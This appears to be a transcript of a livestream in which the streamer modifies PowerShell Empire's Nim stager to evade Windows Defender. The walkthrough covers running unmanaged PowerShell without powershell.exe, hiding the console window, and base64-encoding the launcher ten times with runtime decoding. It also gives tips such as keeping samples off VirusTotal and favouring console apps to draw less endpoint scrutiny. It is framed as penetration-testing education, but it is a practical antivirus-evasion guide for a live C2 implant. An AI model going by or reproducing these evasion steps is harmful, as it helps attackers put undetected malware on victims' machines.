generating the actual stager. Where is the nim happening? Aha, here we go. Data module source nim. So it looks like there is a template of nim code. We're gonna have to open that as well here in just a second to take a look at what the nim template looks like. So it's opening up this file. And then it is replacing this string. It's replacing this string with the with the PowerShell launcher. Isn't that the one you submitted the pull request to? No, I never submitted a pull request to Empire. I submitted a pull request to. Well, we'll get to that here in just a second, because I think it's going to come up. Interestingly, Husky, I think it's going to come up. I submitted a pull request to ByteBleeder on offensive nim. So a little bit of my code is in offensive nim now. For what little clout that is. Please, next time, focus on obfuscation. We're going to focus on obfuscation. We're going to be obfuscating. Don't you worry, Mr. Faisal. Mr. Faisal, don't you worry. We're going to be obfuscating, I promise. I think Empire is using that POC from offensive nim. I agree. I think it probably is. So we can take a look at that here in just a second. And here is and right away I can see the cause of one of our problems. Right away. This is the command execute. This is the execution of the nim compiler. As in, this is where we use the nim compiler to compile the executable that eventually becomes launcher.exe. The problem right here is this. A console app is going to make that console pop up. That console is going to pop up. So when we execute launcher.exe, what? Oh, it's getting killed by Windows Defender. Windows Defender must be killing it. So when we open that console, that app equals console is causing the console to open. So right away, we can fix something. Right away, if I just change this to app equals GUI, Make it a GUI app instead? I bet you the console won't pop up anymore. So, is there a way to reload modules in Empire? Does anybody know? Can I reload? Because Metasploit lets you reload the modules without closing out the server. Help. Does anybody know? I'm going to copy that out, Husky. We may end up using that. We're probably going to change the compile line quite a bit. I'll go ahead and copy that compile line out of there. Because I think that may be useful to us. Okay. So, I may end up go ahead and using that. So, is there a way... Does anybody know if there's a way to reset the... Fuck it. This is going to be annoying. So we're going to restart the server. So it'll reload the console. Or reload the... Restart the server and client so it'll reload the modules. Control-C. Yeah. So the server wasn't fully spun up yet, so that the client is not able to connect. So if we just connect localhost... Okay, use stager. We're going to be doing this a lot today, so just as FYI. Windows, nim, set listener, default HTTP, execute. So let's go ahead and disable Windows Defender here, just for the moment. Because, again, all we're doing here is testing to make sure that if we turn it into a console app, that it will not... that if we turn it into a console app, that console... Or a GUI app, that console will not pop up. So we've written a new launcher.exe now. So let's pull that launcher.exe down. Reload one or all Empire modules. How? Oh, empire.py. Let's take a look. Like, that's a... Just tell me the command. Do reload. Is this on the server? We'll try that next time. We have a card from the fit deck. Extra eye contact on the side. All right. All right, let's execute this and make sure it works, and then we'll do the fit deck. So let's wget, let's get launcher.exe, pull it down. And let's execute it. And sure enough, look. Doesn't pop up. But if we check the task, the console does not pop up. But if we check the task manager. It's probably down here. Launcher.exe. See that? And I bet you we had a new agent check in as well. We did. So now, we don't have to be afraid of the user just closing the fucking console window and killing our program. Does that make sense? So already we've made progress. Already we've made the executable better. Now, I'm going to do a fit deck. However, I want you guys to think about one little thought experiment for you. Husky, don't ruin it. I know you know. Are there any situations in which perhaps we would want there to be a console app? That maybe the app console would be preferred to the app GUI that we chose here. So recall that we changed this to app GUI, and now it doesn't pop up. Are there any considerations that you'd want that you would maybe want that? Okay? Other than testing. I'm talking about on a live target. Testing, obviously, that makes sense because you get the debugging output. But on a real target, I know Husky knows, so I don't want Husky to answer. Okay, I'm trying to get my camera situated correctly. What do we got? That's shitty. Sit-ups. Do crunches. So far that I've seen, nobody's gotten the answer, by the way. Not social engineering. I mean, I guess there are social engineering pretenses that you could think up for having the console pop up. But there are legitimate... The majority of malware that you would see of this nature, of this like running an executable on a target machine, is actually going to use app console. So think of that. And think about why that might be the case. Alrighty. Alrighty. We back. Alrighty. So the answer is antivirus evasion, or endpoint protection. Okay? Endpoint protection scrutinizes GUI apps a lot more closely because they run in the background with nothing popping up. Does that make sense? Endpoint protection will scrutinize GUI apps a lot more than console apps. Now, obviously, you're like, well, that doesn't really matter because we don't want the console to pop up. But what if you pop the console up and then you made a couple of API calls to just move the process into the background, which you can do. So typically what most malware will do is it'll execute and the window will pop up for like a nanosecond, and then the code itself will move it into the background so that it can be a console app, but it can be it could be a console app, but there isn't a nasty window open that the user can close. Does that make sense? Does that make sense? It would be hidden. Yeah. We're not going to do that today. It's not going to be necessary for bypassing Windows Defender. Again, this is a test of Windows Defender. Obviously, there's more stuff you could do to, completely remake this payload generation and make it evade Windows Defender. That's outside of the scope of our stream today. An app GUI will work just fine for us. Is this more for AV? Today, we're talking about antivirus more than endpoint protection, okay? We're not talking so much about endpoint protection today. We're talking about antivirus. Does that make sense? The app GUI will work just fine for us for our purposes today, okay? Nothing makes sense, smooth brain. That's okay. The key is to keep exposing yourself to stuff that doesn't make sense until stuff suddenly does make sense. That's the key. So we do have... So Husky did give us this this list of command line compilers, so we can go ahead and slap this in here. We are going to want CPU equals AMD 64. That's not going to change. Okay. So we're basically going to add some new command line flags. We're going to have nim optimized for size. We're going to set a couple of options like stack tracing and line tracing off and dead code elim on and so on. We're setting a couple of options. This is the one that Husky said is good for AV evasion. I've never used this line in particular. I typically just optimize for size and fucking go for it. But I'm just going to trust Husky on this. I'm just trusting Husky on this. All right, so let's try and compile and make sure that that works before we do anything else. So how do we reload? Do reload? How do I... On the NIM forum, they recommend a strip all. If your payload is well written, the compiler flags aren't going to make or break you. That's why I don't really stress about them. But we can add the strip all as well, just to make this compile line as long as possible. How do we reload this? Help. There's no help. Show help. Help! Command is reload. I've tried that. It doesn't seem to do anything. I don't know what to tell you. Plus, this looks like the old Empire. This is the old unsupported Empire. Whoever sent me this link to where reload is in the old unsupported Empire. So that's useless. I guess we'll just quit out. There's probably a way, but I don't want to get down a rabbit hole of trying to figure out how to reload modules. Whenever we make a change, we want to make sure to go ahead and... Whenever we make a change, we definitely want to make sure to go ahead and reset the reset Empire entirely so that we can make sure that what we just did worked. Because we're modifying Empire itself here. If you modify the PowerShell script itself, you don't need to reload anything to retest running an agent. If you modify the Python wrapper for the module, you can do reload in the module menu to reload the module.py file itself. Okay. We'll do Stream Raiders really quickly. I mean, it just feels bad to, like, restart Empire every time, obviously. I'm not going to lose sleep over it, but... I would rather not reset Empire every time. Alright, get in there, boys. Smash those houses. Burn, pillage. Yes, good work, team. Sorovi and Maji Beg with the most kills, most assists. Again, keep in mind, Empire is open source software. It's completely open source. No one's getting paid to make Empire. This is something a bunch of people are doing in their spare time, mostly. So it's not a big. I don't consider it a big deal that their payloads are. That their interface is like a little bit wonky. Now, if I was paying $4,000 for an Empire license, then I would expect to have then I would be pissed if I couldn't reload modules without restarting all of Empire. Let's take a look at what my quests are. Place 3 balloon busters. Okay. Oh! Yes, honey. Can I help you with something? Yes, I know. Star is here. She's babbling. I'm sure you can't hear it, but she's babbling. What game is this? This is Stream Raiders. It's just a game we play in our spare time. You can play with us if you do !battle and log in with your Twitch creds. Come here, honey. Hey, honey. Oh, she doesn't want. She's being weird. If she comes up, I'll hold her up. Gungo Pause, thank you for the follow. Froggo, thank you for the follow. 90N20, thank you for the follow. Metakin with the first time Prime indoctrination into the passionate club of cephalopod enthusiasts. Thank you so much. Hey Al, do you have OSEP? I do not have OSEP. I would like to get it, but I think I'm gonna do a pen test, a pen test academy cert next, or eLearn security cert, excuse me, just so I can recommend them or not. Okay, so let's use Stager. Use Stager, Windows, NIM, set listener, default HTTP, execute. Wow, that was fast. Wait a minute, it didn't error out, did it? Okay, invalid option strip all. Okay, so that was, so let's just remove that. Or we can look up, let's look up the what does that option do in the NIM compiler? Let's just look up what that option even does in the NIM compiler. I got that from chat. I'm just trusting chat at this point. Let's just look up the NIM compiler. There doesn't seem to be a strip option. Why do I trust chat? It's not an option, it's a program. I'm not running a different program. Because someone's going to fucking restart my VM or some shit. I don't trust chat anymore. We're not friends anymore, chat.
I'll gets pulled into the void.
Indeed. Finglui Muglwanaf Klulu Gagnagel. Fuck. Come here, honey. She's here. She's just like sitting by her scratching post. Come here, sweetheart. I don't know why she's being so weird. You can see her if I move the camera a little bit. There, you can see her down there. I don't know why she's being weird. She usually comes over here. She's plotting her attack. I wouldn't doubt it. Thanks for the 69 Tiggle biddies. The Jinx Effect, thank you for the follow. All right, so let's just remove strip all. Can exit out here. There's no commands that are going to reboot my fucking, or command line options that are going to reboot. Okay, how do I, okay. Who said that, okay, I can reset from the modules menu. Help, back. Help. Use module. Help. There doesn't seem to be a reset module. Okay, well, I don't care about strip all then. I just want to run NIM compiler flags for right now. We're getting too deep down a rabbit hole of NIM compiler flags. God damn it, I really don't want to restart fucking Empire every time. Modules? Help? Like, there's no help or anything. Why is there even a command line here? Like... People can... Okay. I'm not getting down the rabbit hole of resetting the... This fucking sucks, but... Is there options? There's no options. It doesn't give you anything. There's no help dialogue, no nothing. Oh, the server's still spinning up. Can I at least, like, not restart the client, maybe? Oh, I can disconnect. Okay. Okay, there's a so I only have to restart the server, is what it's telling me. So use Stager. Windows. Nim. Set listener. Execute. Okay. Let's delete this. Oh, it's open. It's still open. Let's just end this task. That execute. This is the same one as before. I don't know why I just executed that. End task. Let's just delete this. I meant to delete it. So we should now be able to download that. Let's verify back here that the NIM compilation succeeded. It appears that it did. Yep, so the NIM compilation did not... this is deprecated, apparently, but I bet it still worked. It did appear to still execute. So we did just download the new launcher.exe. And let's execute it to make sure that we get an agent. Launcher.exe is executing. It didn't error out. That's good. And we did get an agent. So... yeah, so we do have agents. These are all, you can see that Empire highlights the ones that are dead, the agents that haven't checked in a while. But we have modified the NIM compiler flags. Again, if you wanted to be really fancy, you could have it run as a console app, but make some system calls to move the process to the background. I'm not going to do that today. That's beyond the scope of today's discussion. For Windows Defender, a GUI app will be just fine if we can manage the malicious strings in it. Do you think TJ Joel's HEB list is still relevant? I think it's even more relevant now because stuff like Forest is good for Active Directory exploitation. Oh, yeah, we got to ban gaming. Got to ban this guy. Okay. I took care of it. All right. Zaz Inobis. Thank you for the follow. Cthulhu Fountain to you, my friend. Okay, so let's kill all... the beacons. So now those agents will not show up because they've all been terminated. How do I go back? Main? There we go. Main menu. Okay, disconnect. Okay, so we disconnect from that. We can kill this this thing. We kill the server. And now we come back over here and we take a look at. Well, it's time to look at the NIM source. So what was the actual? Less nim.py. So what was the pathway? Where was the nim source code located? Data module or self main install path. Data module source nim execute PowerShell bin.nim. Okay. So I guess that's probably user share Empire or PowerShell Empire. Empire. Probably in server. Data. Module source. Here we go. Nim. Execute PowerShell bin.nim. Let's see what we have. What we have in here. Okay, that's what I figured. Oh dear. Oh, it hurts. It hurts. I'm not paying $4,000 for it. I'm not paying $4,000 for it. I'm not paying $4,000 for it.
Bruh, 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 bruh.
Oh my god. Okay. So this is good. This is good. This is good for the chat. Okay? This is good for the chat because what you're witnessing here, this is what happens when you just use code that you found on GitHub, slap it into your project, and then just fucking roll with it. And like without understanding anything about what it's doing. Okay, so and the smoking gun is right up here. Where do you guys think this came from? Where do you guys think that this fucking code came from? As long as it works, it does technically work. Gritting my teeth so hard that they grind into dust. It does technically work. You're not wrong. It does work. But we're going to talk about what a fucking nightmare this code is here in just a second. Let's take a look at where it actually came from. It came from here. And the reason I know this is I recently modified this code myself, and I submitted a pull request to this exact repo to make this exact code that they copied here better. But unfortunately, they took this code before I made my pull request. So they have the old version. I'm at least glad that they cited. Did they though? Did they though, Husky? Because they just didn't remove this. This is in the default one where it's in the source. Like, did they cite it, or did they just not remove the comment? This is it. Execute PowerShell bin.nym. They barely even changed the name. No, it's the same. It's the same. And if you look at between the two codes, there's some similarities you may notice. You may notice there are some similarities. Oh my god, this is a disaster. Oh my god, I hate it. Chat, hold me.
Must hunt.
So, they just renamed it, and they replaced get process with this script placeholder where they put the loader. That's it. That's all they did. That's all they did. That's all they did, my dude. And Husky's like, good thing they cited ByteBleeder. Did they, though? Because ByteBleeder signed it in a comment up here, and they just didn't remove that. They couldn't be bothered to even remove that. I'm not paying $4,000 for it. I'm not paying $4,000 for it. I'm not paying $4,000 for it. It's okay. I have to remember. It's okay. It's okay. Hold me, chat. And that's not the only thing that's the problem here. Do you guys remember that weird debugging output? Do you guys remember that weird-ass debugging output we were getting? Like, when the console was still popping up, it was giving us all that text was appearing that talked about PowerShell run spaces, and things like that. Do you guys remember that? All that weird debugger output? That's coming from here. Like, that doesn't have to show up. That doesn't have to show up. ByteBleeder, the original author of this code, was trying to figure out how to get PowerShell run spaces to work, and he was using Sugar, which is a useful NIM library for showing the contents of a particular area of memory and giving information about it. So he was putting it, it was basically super verbose debugging mode. It's basically super verbose debugging mode because this is just a POC. Does anybody know? Fun fact: does anybody know what this code is actually doing? At a high level, what is this code actually doing? Don't say executing PowerShell. It's not what I'm looking for. I mean, it is executing PowerShell, but I'm looking for something a little bit more specific. Does anybody know what this code is actually doing? It loads the system automation.dll, yes. It does do that. I can't see well on my phone screen, to be frank. I don't know. Oh, here, I'll just post. I'll give you, like, the link here. Hang on. The code is using loading PowerShell dynamically. It is doing that. So this is what's called... So what this is doing is... what this code is doing is it's loading the common language runtime and a PowerShell run space all by itself. It's calling system.automation.dll, and it is creating a PowerShell run space without PowerShell.exe. The most common way to execute PowerShell is with PowerShell.exe. But there are ways to load the common language runtime and create a PowerShell run space that does not work with that does not use PowerShell.exe. And this is a sneaky little way you can get past endpoint protection and antivirus because, again, you're not executing PowerShell.exe. You're dynamically loading the common language runtime into the process. And it's really cool that NIM actually can do this. NIM actually has access to the low-level Windows APIs that are required. This is one reason why NIM is so good for offensive tooling, is you can load the common language runtime. You can access the low-level features of Windows, like the Windows API. Okay, how can we identify it? You can identify there are other things you have to do to flag on PowerShell run spaces that don't use PowerShell.exe. Okay, that's all great. If you're going to try to execute PowerShell, I'm glad they did it this way, rather than just executing PowerShell.exe. Okay, because they could have done that with their PowerShell NIM loader. Instead, they decided to pull code from offensive NIM, which is not a bad choice, but they could have spent 10 minutes to actually understand what the code is doing. Because this is useless. This isn't even being used, I don't think. I don't think str format is even being used. The str format library is even being used in here. There's a lot of unnecessary code in here. Like, for example, this is the code that I added. You'll notice this is the only code that doesn't appear over here. This code right here. That would be because your boy wrote it. This is your boy's code. I wrote this. So, in the original code that ByteBleeder wrote, which is over here, you couldn't access the PowerShell output. Okay? You could run PowerShell. The PowerShell would execute, and you could verify that it would execute, but you could not get it to display the output. NIM does not seem to have a the WinNIM library does not seem to have a way to deal with PowerShell objects yet. PowerShell does everything in objects. It outputs PowerShell objects. That's why this out string is here as well, because I didn't want a PowerShell object outputted. I wanted a string outputted, and then I just wanted to reveal the string. But if you actually remove this out string, you still get output now with this little for loop. But the for loop that I added now prints the output. You now get the output of this result. That's what I'm trying to say. I figured out how to print the output. All right, so that was my little contribution to offensive NIM so far. Running PowerShell and printing the output. But you'll notice that, do we even need output to be printed? Do we need the results, the output results of our command here? Like, in this payload, do we need output? Fuck no, dude. We don't need any output. And we certainly don't need fucking sugar. So we can fix this, okay? We can rebuild it. We have the technology, okay? We can rebuild it. We have the technology, all right? All right. We're going to fix this. Your boy Al is here. We have the technology. We can fix it, okay? Get the fuck out of here, sugar. You are unneeded. I don't think we need str format either, but I'm going to leave it there for right now just in case. So all these dump statements can fucking go. Don't need this. Don't need this. So this is where we load the DLL. Then we get the specific run space factory type object here, and then we run the create run space method, which creates an unmanaged PowerShell method. That's what this is called, by the way. Unmanaged PowerShell. I'm not sure if I said that. If you hear people talking about unmanaged PowerShell, excuse me. Oh my goodness. If you hear people talking about unmanaged PowerShell, str format isn't used. The compiler set it in the warning. Did it? Okay. I'll remove that then. That can go. Watch it throw an error now, even though we're not using it. We'll keep the... I don't think we need the out string either. We certainly... we don't need the results. We can just take this away. So here's what we do. We create... here's basically what we're doing. We're loading the common language runtime. And then we are creating a PowerShell run space. And then we're creating a pipeline, which is basically a series of PowerShell commands to execute. Keep in mind that PowerShell is really just a scripting language for .NET. So that's why we can do this. We're really just writing a script for .NET. That's really what we're doing. So we create a pipeline, which is, again, PowerShell commands to execute. Then we add this script to it, and it looks like this script is where our malicious string is getting loaded. And then we're adding an out string to the end, which is going to get, if you use the .add method, I learned this while trying to figure out how to fix this and make it print the output. If you add the .add method, this pipes this command to the end of this one. If you use add statement instead, I know way too much about this now because I spent a long time trying to get this to work for my own purposes. I had a reason that I wanted to execute on managed PowerShell in NIM. So I had to spend some time figuring this out. But if you use add statement, it will not pipe the results. I don't think you need this add string at all. I don't think you need it. Can we remove that? We do need this pipeline invoke. This invoke is going to execute the commands in the pipeline. Okay? The invoke is going to execute the commands in this pipeline. Does that make sense? So we need that pipeline.invoke. We do need that. We don't need var results. We can get rid of that because we don't need the output. All we need to do is echo it. We can get rid of this. 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 Okay? All that was debugging output. Okay? Notice how short and clean it is now. Look at how short. It's so clean, chat. Look at how clean it is. Feast your eyes on how short and clean this code is. And watch it now error out for some unknown reason. Okay? Does it make sense what I've just done? Okay? We do have to do runspace.close. It does not like it if you don't do that. Okay? It's not good. But you can see what we've done. You can see we've made it so much shorter and cleaner now. So let's go ahead. Now, before we do anything else, let's go ahead and execute this. I did write it, didn't I? Yeah, I did. Okay. Okay, so another thing that you should have done, to be fair, another thing that you should have done was back up this file ahead of time. I didn't back it up. I just kind of freeballed it. But as it happens, we already have a backup. As it happens, there's already a backup. So I'm not too concerned about it. But it would have been good practice to just to copy this file and rename the original to like execute PowerShell bin.nim.back or something, just in case we fuck something up and wanted to restore it. In this case, we do have this. And I was just feeling so excited about modifying it that I forgot to do that. But that would have been better practice. If you're going to be modifying like parts of Empire or Metasploit modules or something like that, it's always a good idea to have a backup file just in case you need to restore it to the original. Is it a backup if the backup is better than the current version? I mean, it technically is. Again, the backup is just a safety net. Let's just start up the server again. We'll let that load. This still won't get by AV since we don't actually modify the executed string. Correct! Killer, you're absolutely right. But in this case, I think it's more important to fix the absolute dog shit that the code is. Before we go about trying to modify the code to get past antivirus, I think it's better to be working with shorter, much more clean code. Okay? And Husky is right. You might be surprised. In this case, we know it's flagging on the malicious string. So I do suspect that antivirus will still catch it. But but NIM is actually very sneaky to antivirus just by default. So we may see. Hang on a second. Connect, text C, localhost. We'll connect to a server again. Okay, we're connected. Use Stager. Windows, NIM. Set listener. Please don't error out. Please don't error out. Please don't error out. Don't do it. Don't error out. Don't do it. Okay, good. It's hanging, which is good. I don't think we... Okay. It is executing. Yes, yes, yes. It's compiling. Didn't error out. We deleted like 3/4 of the fucking... We deleted like 3/4 of the file and it's compiling. Suka... I'm not gonna say it. I'm not gonna say it. I'm not gonna say it. Not gonna say it. Not gonna do that. Braunhilde. Not gonna do that. Okay, so it looks like it's written the launcher. Let's make sure it's the correct one. 2150. Yep, that's now. So that is the most recent version. And let's run it, and let's make sure we get an agent. If we don't get an agent, then we... What do we do if we don't get an agent? We cry. Okay? That's what we do. We cry. Like, that's our fallback, okay? No, but really, we restore it back to the old version, and we change less about it. Is basically what we do. Launch. It says launcher is running. But I don't see it running. Oh, here it is. End task. Error. That's not good. Oh, it's error because the server stopped talking to it. That's why it's erroring. So let's just delete this. Pulling down the new one. Let's execute the new one. Give me an agent, you son of a bitch. Did it execute? Yes! It's executing! It's working! It's working! Hang on, hang on. Do we have that? We don't have that. Imagine I'm Anakin Skywalker and saying it's working, okay? Imagine that. That's for the memes. It's important. And we get an agent. Yes! We get an agent. Excellent! Let's interact with it. Make sure it's executing as expected. It is. Fantastic. Okay. Let's run it against antivirus really quickly. We can kill all. Let's see if antivirus catches it. I do suspect that antivirus will still catch it, but we'll see. But we've cleaned up the code quite a bit. Okay, so antivirus does still catch it, okay? Antivirus does still catch it. It's okay. Now the actual obfuscation begins. Now that we're dealing with... And we see it's still flagging on the same area, which is good. Nothing has changed, really. Do you use online scanning platforms? No. I do not upload my stuff to online scanning platforms. If I can, I install a version of the endpoint protection in an isolated lab so I can test against it, if I need to. But uploading your stuff to VirusTotal is a one-stop shop to getting it caught by everything tomorrow. All right. Alrighty. So, now we get to do the actual antivirus evasion, which is great. Now we have, we now know exactly where it's breaking on. We know it's flagging on the signature. We know the signature it's flagging on. Another thing we can remove is this reference to Byte Bleeder. This doesn't need to be here. Again, and now it's... When you're modifying code like this, it's always better to be dealing with a short little, like, 10-line script rather than pages upon pages of garbage. So we've cleaned this up quite a bit and made a functional payload that is much easier and cleaner to read. Okay. All right. So Obfuscation. I think you need to add your signature. It's not my code. I didn't write it. I sent a pull request to Bytebleeder's code to add a couple of lines that would print output, which is useful. And I'm glad I could be useful in that way. But it's not writing the whole code. Bytebleeder did it all. Okay. So, now, all we need to worry about is that string, it looks like. Well, at least the first thing we need to worry about is that string. From my experiments with unmanaged PowerShell in NIM, it is that string that's breaking it. As far as I am aware, as of like last week when I last played with it, Windows Defender will not flag on loading a unmanaged PowerShell run space. It will flag on a malicious string being run in that unmanaged PowerShell run space. So, what are some ways that we can modify that string? Yeah, base64 encode. We could try base64 encoding it. Now, oftentimes, base64 encoding just once isn't going to do much good. Oh, by the way, remember we talked about Empire has a number of built-in like features that you can use to obfuscate your payloads. We're doing it manually today because I think it adds more wrinkles to our brain if you can see me modifying the source code of Empire and so on and so forth, rather than just changing some options in the payload generation. So I think this does us some good. But on an actual operation, you probably wouldn't do this because it would take too long. You would instead just try obfuscating it using Empire's built-in functionality for that stuff. So I saw a really cool encoding method on John Hammond's video with Chinese characters. That sounds fucking awesome. Yeah, you can. There's literally when you're talking about encoding, you're literally only limited by the number of by your own creativity. There are so many ways that you can. There are potentially infinite ways that we can decode, that we can encode this payload. Okay, let's keep it simple. Again, as a pen tester, at the outset, it's probably best to just keep it simple, stupid. Okay, keep it simple. KISS. Keep it simple, stupid. Okay, so let's try base64 encoding. Let's just try that first. All right. But typically one base64 encode is not going to really do us any good. Typically, I like to base64 encode a whole bunch of times in a row because antivirus solutions are on to base64 largely, and they'll either flag on the base64 string or they'll recognize base64 and try and decode it and see if there's a malicious string inside of it. So we can encode it a large number of times. So let's go ahead, and before we let's do it properly this time. Sudo copy nim.py, and let's copy it to nim.py.back. Okay, so we now have backed up nim.py. The only thing that's been changed in nim.py is the compiler flags, which I'm fine with being in the backup. Okay, but we're gonna actually write some Python now to play with the payload. So sudo vim nim.py. All right, so we see that it is generating the launcher, or it's generating the stager, which is a PowerShell command, which is what's being flagged on. So what's being flagged, the malicious string that's being executed in PowerShell is being saved in this, appears to be saved in this variable, this launcher variable right here. Then if that launcher isn't generated, it prints an error and returns. And then this is where it sets the nim source file. It decodes it. It replaces this string. It replaces this braces script string in the launch with the launcher. So if we go back to this This string is being replaced with the launcher string when Empire generates the payload. Hopefully that's clear what that's doing. Then it is writing the modified nym source to temp launcher.nym. That's why we're seeing it in the debugging output. Then it is compiling it, and it's moving launcher.exe into the proper launcher directory. Does everyone understand what it's doing here? So we can play with this launcher and encode it. So let's do a for loop here for x in range 0, 10. Let's do it 10 times. Let's base 64 encode 10 times. Launcher equals... we're going to have to import base 64. From base 64, import B64 encode. Okay? Because all we need is that one function. Let's go back down here. Launcher equals B64 encode of launcher dot encode. Let's just specify UTF-8. It needs to be UTF-8 encoded. That is the default, but just in case. And then I think we need to suffix this with a decode. Because Python 3 works in Unicode by default, so if you want to encode it, it has to be in... If you want to put it in UTF-8, it has to be in... I think this is correct. So it's going to count... So this is a for loop. So it's going to count 10 times, and every single time it's going to base 64 encode the launcher, and then save that new encoded version in launcher. Then it's going to base 64 encode the already base 64 encoded string again, and then it's going to do it again, and it's going to do it again, and it's going to do it again, and it's going to do it again 10 times. Okay? Does that make sense? This is a very, very simple way of encoding. But again, and if we need to go to something more complex, like hexadecimal, or again, you are not limited by anything except for your own creativity in encoding. The file might become a little big. No, it won't. Base 64ing a brief PowerShell string 10 times isn't going to make it that much noticeably bigger. Like, the string itself might be a little bigger. It's going to be bigger, sure. But the file is not going to be huge. It's just going to be... It might be 100... It might be 200 bytes longer or something, which is really nothing. So is doing this manually like this the same as what Shelter is doing or something? I'm assuming Shelter is some kind of tool that would do this. Yeah. We're modifying Empire itself to do it. I think this code should execute. And then it should compile. So let's go ahead and go with that. I'm double checking. We decode it. So just to verify, we're taking the launcher variable, which is declared up here. We're base 64ing it. We do need to encode it UTF-8 because that's what base 64 encode expects. And then we want to decode it with UTF-8 so that it can be thrown into this loop again. That's what we're doing. I think that's correct. So let's see if that executes properly. Let's look at, for reference, let's look at launcher.exe now. Let's go strings launcher.exe. Let's pipe it into less. Let's take a look-see. So we're seeing, again, this is a binary file. It's in C, but the malicious PowerShell string should show up in here. Yeah, here it is. So this is the actual malicious string that's being flagged on. So you see it's just a heavily obfuscated, like, camel-cased version. It's just a camel-cased PowerShell script. Camel casing is often used to screw up signature-based detection like this. And then we're piping it into invoke expression. Too many clear text screen. Oh, I agree. I agree. There's lots of ways that you can obfuscate this. We're doing it the simplest possible way. My point is, I'm only showing you this to demonstrate that after we If our code runs correctly, we should see a bunch of base64 encoded data here instead of this. So let's see if we get that. So it's not going to run. It's not going to run, obviously, because we're not base64 encoding, decoding on this side. So it's just going to try to run base64 encoded data. So it's not going to execute, but we don't care about it executing right now. Let's exit the server. We're not going to worry about it executing. I just want it to generate. I want to make sure that my Python code is executing correctly. So main. Oh, connection refused. I should have disconnected from the server before killing the server, I guess. Okay, so let's start the server up again. I'm sorry we have to do this. I don't want to go down a rabbit hole of trying to figure out how to load modules in Empire. Or reload modules in Empire without restarting the server. Excuse me. Okay. Use stager. Windows nim. Okay. Set listener default HTTP. Execute. So it should still compile. I don't see why it wouldn't compile. But it will error out if you try to execute it. Yep, it looks like it is executing. Or it is compiling, excuse me. Okay, it looks like it's finished. It is. Let's start this back up again. Okay. And now we let's go back to, or we're not gonna feed it to our, I remember, we're not gonna, let's look at the strings again. We're not gonna execute it here. Let's scroll down. We should see a bunch of base64 encoded data. There it is. See, look. This is our string that's been base64 encoded 10 times. So our code runs as expected now. We didn't get any errors. Our code now runs as expected. So now what do we need to do? What do we need to do to make our payload actually execute now? Anybody have any questions? Anybody have any ideas on what we need to do next? Let's do Stream Raiders really quickly while we I wouldn't say that's only 200 extra bytes. It's not a super bigger. It's not super big. It's not that much bigger, honestly. It's not a big deal. Encoding is generally always going to make your file bigger. That's like kind of just how it works. Yeah. So now we need to go in the NIM source, and we need to tell NIM, hey, we want you to, before you actually run this payload, we want you to decode it, to base64 decode it 10 times. So we need to go into the NIM source.
It'd be cool down the road to make the implants triggerable.
It'd be cool down the road. What do you mean to make the implants triggerable? What do you mean by that? So yeah, we need to decode it at runtime. Ideally, when in the executable within the static executable, there would exist this base64 encoded data. But when it runs, when the executable actually runs, it would decode it at runtime and then execute it. Maybe decode it into a sequence, then append the sequence in chunks. Yeah, you could do that. I'm trying to keep it as simple as possible. This is a little bit, I don't want to lose people. We're trying to get past Windows Defender through the keep it simple, stupid method. I don't want to just start doing super advanced stuff. But that's why we're going to try base64, and we'll go into something a little bit more crazy, like hexadecimal encoding or whatever, if we need to, if the base64 doesn't work. But I suspect that it actually will. We'll see. Usually, I find that if you base64 like anywhere between 10 and 50 times, stuff tends to work much more easily. Manicus Maximus and Mr. Ed Makes with the most kills and most assists. Mill and C-Top with the bonus rewards. Let's go down here. I guess we can go this way. It's the same number of... Or no, it's not. This is quicker. Or no, we can't go that way. We're going here first. I assume that Empire agents will beacon out to us by default by silver agents. Sliver agents, but make the Empire agent triggerable so it can come back later. Oh yeah, it can already do that. It has a built-in... ability to do that, I believe. Okay. All right. So now all we need to do is we need to modify NIM to decode our base 64. Okay? We need to modify the NIM source code to... that's nim.py. We don't want that. Okay, so we need to import the base 64 library, which I think is import std base 64. It's within the standard library. We need base 64, and then we need... So let's set a variable equal to Cthulhu equals... or it's going to be var Cthulhu equals we can have these, and then we can put this this script thing in here. That string needs to be in here instead of just loading it straight into the PowerShell runtime or straight into the pipeline, PowerShell pipeline. We're gonna load it into a variable first so we can fuck with it. Okay, so then we'll just have it execute Cthulhu. Okay. Okay. I think that should work. It's replacing 2 double quotation marks on either side and 2 braces, if I remember from nim.py. Okay, so we set... So now we want to... Okay. 4x and... Okay, so nim for loops work a little bit differently. It's going to be x in 1, 10. Nim has inclusive subsets, so it needs to be like that to get 10 times. 4x in 1 to 10. Cthulhu equals base 64. How does base 64 work in nim again? Before I start assuming what the methods are, what the functions are, let's go back over to base 64 in nim. Decoding data, it's just decode. Okay. Decode Cthulhu. I think that should work. Oh, this has to be a colon. I think that's correct. I hope it's correct. I wonder if we're going to have a problem with this. Even if this works, I wonder if we're going to have a problem, but we'll cross that bridge when we come to it. All right, so let's I didn't think about this problem ahead of time, but we'll just let's just I hope I don't have the problem. Let's just say I hope I don't have this problem. But if we do have the problem, I'll explain what the problem is. Let's disconnect. Let's kill the server. Okay, execute it again. We did modify the nim, right? Before I... Okay. So let's hope it compiles, first of all. Let's connect to the server. Okay. Use Stager. Windows. NIM. Set listener. Default HTTP. Execute. Okay, it looks like it's compiling. It didn't error out. Okay, cool. It didn't error out. So it looks like... Oh, thank you. Took you a while to sneeze. Yeah, I had one of those situations where you need to sneeze, but it won't quite come out. Why do we need the for loop? Because he encoded the payload 10 times? Yep. So we have to decode it 10 times to get the original string back. That's the idea. So it looks like it compiled. That's good news. Now, let's see if my issue that I suspect is going to be present manifests itself. Let's look at the launcher string. So we should... Let's look and make sure the base 64 is still there, because... Okay, it is still there. Excellent. Okay. I was a little bit concerned that there might be compile time. I was a little bit concerned there might be compile time optimizations. That it might decode this string at compile time to make the file run faster upon execution. It looks like that was not actually necessary. Okay, it looks like it didn't actually do that. I've had problems in the past with NIM trying to optimize my code when I demonstrably do not want it optimized. But it looks like it did not do that, so that's good. Now let's see if threat check catches this. So let's go back over here to our Windows. Let's delete launcher.exe. Is launcher.exe still here? No, it is not. Okay. So let's wget new launcher.exe. And let's go ahead and run threat check against it. My goodness. My goodness. One and done, my dudes. Base 64 fucking pog. Oh, I think I disabled Windows Defender, actually, so it's going to run regardless. Let's just verify it runs when Windows Defender is running. Turn on real-time protection, because
A hunter must hunt.
